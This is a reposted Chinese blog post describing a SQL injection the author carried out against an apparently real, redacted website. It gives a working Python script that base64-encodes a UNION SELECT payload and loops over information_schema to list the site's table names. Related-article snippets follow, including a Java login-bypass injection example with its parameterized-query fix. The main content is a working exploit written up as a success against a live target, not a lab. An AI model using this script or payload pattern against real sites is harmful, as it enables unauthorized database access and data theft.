一个网站SQL注入的案例

最新推荐文章于 2024-03-10 08:57:42 发布
最新推荐文章于 2024-03-10 08:57:42 发布
阅读量333 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/MiWhite/p/7096144.html
版权

网站的页面提交参数做了md5转换,而且参数会带入两个SQL语句中执行。

注入是肯定存在的,但是SQLMAP怎么都跑不出来(可能原因是其中有个SQL语句总是报错)。

尝试手工,发现 order by 报错。; ) 没关系,那就直接上union select。

经过尝试发现 union select 1,2,3,4,5,6,7,8,9,10 成功爆出显示位。下面写个脚本跑表,收工。

# -*- coding=utf-8 -*-
#!/usr/bin/evn python
# create: mi_white
# Date:2017.06.29

import requests
import re
import base64

payload = """+union select 1,2,3,4,5,6,concat(0x7e, (select table_name from information_schema.tables limit ~~,1),0x7e),8,9,10 #"""
url = '''http://www.XXXXX.com.cn/W.php?QuerySuffix=~~&page=1'''

print u"正在读取表名:"
for i in xrange(1,190):
    a = payload.replace("~~",str(i))
    b = url.replace("~~", base64.encodestring(a))
    try:
        req = requests.get(b,timeout=10)
    except:
        print u"读取页面失败。"
        continue
    try:
        html = re.findall(r"~(.*)~",req.text)
        print html
    except:print u"表名读取失败。"

 

转载于:https://www.cnblogs.com/MiWhite/p/7096144.html

weixin_34281537
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sql注入示例
我想我是海 冬天的大海 心情随风轻摆
05-19 1225
Sql注入是我们经常听说的,具体极大的风险性,下面给一个比较直观的示例:
SQL注入基础原理与案例(详细总结)
剁椒鱼头没剁椒的博客
10-20 6381
本篇总结了学习SQL注入的笔记,暂时没总结WAF绕过方面的内容,后期会对WAF绕过进行总结。目前先总结一些基础的东西,可能有些参数不全,具体的参数或者函数可以百度搜索一下。发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
一文带你学习SQL注入
大河之犬的博客
12-21 5465
但需要注意的是,存储过程中也可能会存在注入问题,因此应该尽量避免在存储过程内使用动态的SQL语句。如果无法避免,则应该使用严格的输入过滤或者是编码函数来处理用户的输入数据。下面是一个在Java中调用存储过程的例子,其中。
SQL注入漏洞原理及注入示例
m0_62480631的博客
03-10 1850
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询等操作。用户可以修改参数或数据,传递给服务端,导致服务端拼接了伪造的SQL查询语句,并将伪造的SQL语句发送给数据库服务端执行,数据库将SQL语句的执行结果,返回给服务端,服务端又将结果返回给客户端,从而获取到敏感信息,甚至危险的代码或系统指令。
SQL注入-11】base64注入案例—以Sqli-labs-less22为例(借助BurpSuite工具)
m0_64378913的博客
05-06 2800
目录1 base64注入概述1.1 base64编码基础1.2 base64编码与URL编码1.3 base64注入2 base64注入案例2.1 实验平台2.2 实验过程2.2.1 注入前准备2.2.2 判断注入点及注入类型2.2.3 尝试使用union查询2.2.4 获取库名表名字段名字段内容 1 base64注入概述 1.1 base64编码基础 定义:Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进制数据的方法。 Base
sql注入网站源码
04-09
挺好的带有sql注入漏洞的asp网站源码,可以自行搭建环境。
SQL注入绕过实战案例
08-31
SQL sqli-labs-master 靶场搭建
ASP+AXCCESS的SQL注入案例
10-28
一个包含sql注入漏洞的asp网站,数据库采用acess,web安全方面很好的入门案例,新手学习必备
SQL注入手动盲注案例
最新发布
05-30
SQL注入手动盲注案例
SQL注入漏洞全接触.ppt
11-15
一、 SQL注入漏洞的定义和原理 * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取攻击者想得到...
mysql sql注入例子_SQL注入的实际案例
weixin_39723010的博客
02-05 916
发动SQL注入要做的三件事确定Web应用程序所使用的技术为了确定所采用的技术,攻击者可以考察Web页面的页脚,查看错误页面,检查页面源代码,或者使用诸如Nessus、AWVS、APPSCAN等工具来进行刺探。确定所有可能的输入方式一般来说,所有HTTP的GET和POST都应当作用户输入。为了找出一个Web应用所有可能的用户输入,我们可以求助于Web代理,如Burp等。查找可以用于注射的用户输入在找...
记一次对真实网站SQL注入实战
qq_43678263的博客
03-31 4744
记一次对真实网站SQL注入实战前言发现过程漏洞利用总结 前言 某集团股份有限公司网站存在SQL注入漏洞 发现过程 用针对性工具扫描(这里使用的是超级SQL注入工具)问题网站,得到以下链接均存在SQL注入漏洞 问题URL: fuwu_fanwei.php?fid=1 fuwu_zhichi.php?zid=5 video.php?video_id=1 news.php?nid=1 about.php?aid=1 fuwu_fanwei_content.php?fid=1&id=1 漏洞利用 这里使
如何对网站进行SQL注入
gpssmet的专栏
10-01 1万+
在不懂技术的时候,总觉的SQL注入是很牛逼的东西,如何绕过用户名和密码的验证来实现注入呢,写代码时间久了之后,慢慢了解了这个技术,其实不是什么神秘的东西,原理很简单,利用SQL语句本身的逻辑漏洞实现,当然本贴只给新手观看的,因为本人也是新手,老鸟就速度绕道吧 sql绕过用户名和密码,我只讲最简单的一种方式,让大家懂了原理就好 后台从前台获取用户名和密码, 假设账号的字段为user,密
sql注入一个例子让你知道什么是sql注入
热门推荐
qq_41246635的博客
08-03 1万+
sql注入一个例子让你知道什么是sql注入 这篇文章说的非常好 https://www.cnblogs.com/sdya/p/4568548.html 我就是按照文中例子,亲自在我之前用final架做的项目中,操作了一遍,的确是实现了用户登录。 在不知道用户名和密码的情况下实现了用户登录 重现sql注入过程如下: 1、在用户名输入' or 1=1 --,然后随便输入一个密码 ...
Sql注入基础原理介绍(超详细)
weixin_30325487的博客
09-06 4297
一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 二、Web 程序三层架构 三层架构(3-tier architecture) 通常意义上就是将整个业务应用划分为: 界面层(User Interface layer) 业务逻辑层(Business Logic...
血腥!实况转播SQL注入全过程,让你知道危害有多大。
weixin_30532973的博客
03-31 947
前阵子发现公司的网站SQL注入漏洞,向项目经理提了以后,得到的答复异常的冷淡:“早就知道,这种asp的网站肯定有漏洞,要是Asp.net的网站就没问题”,先暂不评价此说法对错,如此冷淡的反应只能说明了对SQL注入的无知,今天就实况转播,来告诉大家SQL注入究竟有多大的危害。 初步注入--绕过验证,直接登录 公司网站登陆如下: 可以看到除了账号密码之外,还有一个公司名的输入,根...
sql注入注入原理讲解
cuiyaoqiang的博客
06-11 1085
前段时间,在很多博客和微博中暴漏出了12306铁道部网站的一些漏洞,作为这么大的一个项目,要说有漏洞也不是没可能,但其漏洞确是一些菜鸟级程序员才会犯的错误。其实sql注入漏洞就是一个。作为一个菜鸟小程序员,我对sql注入的东西了解的也不深入,所以抽出时间专门学习了一下。现在把学习成果分享给大家,希望可以帮助大家学习。下面我们就来看一下。 一、什么是sql注入呢? 所谓SQL注入,就是通过把SQ
Sql注入实例
进击的小小白
01-09 1803
一,靶场环境 目标网站:http://172.16.43.117:8011/ 工具:椰树V1.9-web安全扫描工具 (最后附上网盘链接) 二,使用工具查找注入点 1,将url链接放入工具中,点击扫描网站,并且等状态栏为done时,扫描完成,发现2个注入点 三,进行注入 1,在刚刚发现的注入点上右击鼠标,选择第二项进行注入 2,跳转过后,打开数据库选项卡,看到数据库Test_E...
sql注入实例分析
weixin_30624825的博客
07-23 3417
什么是SQL注入攻击?引用百度百科的解释: sql注入_百度百科: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执...
java sql注入案例
06-13
Java SQL注入是一种常见的安全漏洞,攻击者可以通过构造恶意的SQL语句,获取或修改数据库中的数据。下面是一个简单的Java SQL注入案例: 假设有一个使用JDBC连接数据库的Java程序,其中一个查询用户信息的方法如下: ``` public User getUser(String username, String password) throws SQLException { String sql = "SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'"; Connection conn = DriverManager.getConnection(url, user, passwd); PreparedStatement pstmt = conn.prepareStatement(sql); ResultSet rs = pstmt.executeQuery(); if (rs.next()) { User user = new User(); user.setUsername(rs.getString("username")); user.setPassword(rs.getString("password")); user.setEmail(rs.getString("email")); return user; } else { return null; } } ``` 这个方法接收一个用户名和密码参数,从数据库中查询对应的用户信息。但是,如果攻击者将恶意的SQL语句传递给该方法,就可以造成SQL注入攻击。例如,如果攻击者将用户名参数设置为: ``` john' OR '1'='1 ``` 则构成的SQL语句为: ``` SELECT * FROM users WHERE username='john' OR '1'='1' AND password='xxxxx' ``` 这个SQL语句会返回所有用户的信息,因为'1'='1'永远为真。攻击者可以通过这种方式获取到所有用户的信息,甚至可以修改数据库中的数据。 为了防止SQL注入攻击,应该使用参数化查询,将用户输入的参数作为参数传递给SQL语句。修改上面的代码如下: ``` public User getUser(String username, String password) throws SQLException { String sql = "SELECT * FROM users WHERE username=? AND password=?"; Connection conn = DriverManager.getConnection(url, user, passwd); PreparedStatement pstmt = conn.prepareStatement(sql); pstmt.setString(1, username); pstmt.setString(2, password); ResultSet rs = pstmt.executeQuery(); if (rs.next()) { User user = new User(); user.setUsername(rs.getString("username")); user.setPassword(rs.getString("password")); user.setEmail(rs.getString("email")); return user; } else { return null; } } ``` 使用参数化查询后,即使攻击者传递恶意的用户名和密码,也不会造成SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值